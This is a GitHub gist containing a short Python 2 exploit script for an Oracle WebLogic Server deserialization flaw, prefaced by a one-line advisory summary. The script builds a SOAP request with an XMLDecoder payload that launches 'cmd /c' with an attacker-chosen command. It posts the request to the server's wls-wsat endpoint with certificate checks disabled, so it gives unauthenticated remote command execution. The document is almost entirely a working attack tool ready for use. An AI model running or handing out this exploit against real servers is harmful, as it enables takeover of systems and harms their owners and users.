Created
December 28, 2017 02:51
-
-
Save wofeiwo/67f45cad49bb61c6819e7f0ebb7f6afd to your computer and use it in GitHub Desktop.
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| def payload_command (command_in): | |
| html_escape_table = { | |
| "&": "&", | |
| '"': """, | |
| "'": "'", | |
| ">": ">", | |
| "<": "<", | |
| } | |
| command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>" | |
| payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \ | |
| " <soapenv:Header> " \ | |
| " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \ | |
| " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \ | |
| " <void class=\"java.lang.ProcessBuilder\"> \n" \ | |
| " <array class=\"java.lang.String\" length=\"3\">" \ | |
| " <void index = \"0\"> " \ | |
| " <string>cmd</string> " \ | |
| " </void> " \ | |
| " <void index = \"1\"> " \ | |
| " <string>/c</string> " \ | |
| " </void> " \ | |
| " <void index = \"2\"> " \ | |
| + command_filtered + \ | |
| " </void> " \ | |
| " </array>" \ | |
| " <void method=\"start\"/>" \ | |
| " </void>" \ | |
| " </java>" \ | |
| " </work:WorkContext>" \ | |
| " </soapenv:Header>" \ | |
| " <soapenv:Body/>" \ | |
| "</soapenv:Envelope>" | |
| return payload_1 | |
| def do_post(url_in, command_in): | |
| payload_url = url_in + "/wls-wsat/CoordinatorPortType" | |
| payload_header = {'content-type': 'text/xml'} | |
| result = requests.post(payload_url, payload_command(command_in ),headers = payload_header,verify=False) | |
| if result.status_code == 500: | |
| print "Command Executed \n" | |
| else: | |
| print "Something Went Wrong \n" | |
| if __name__ == '__main__': | |
| command_in = raw_input("Eneter your command here: ") | |
| url_in = sys.argv[1] | |
| do_post(url_in, command_in) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment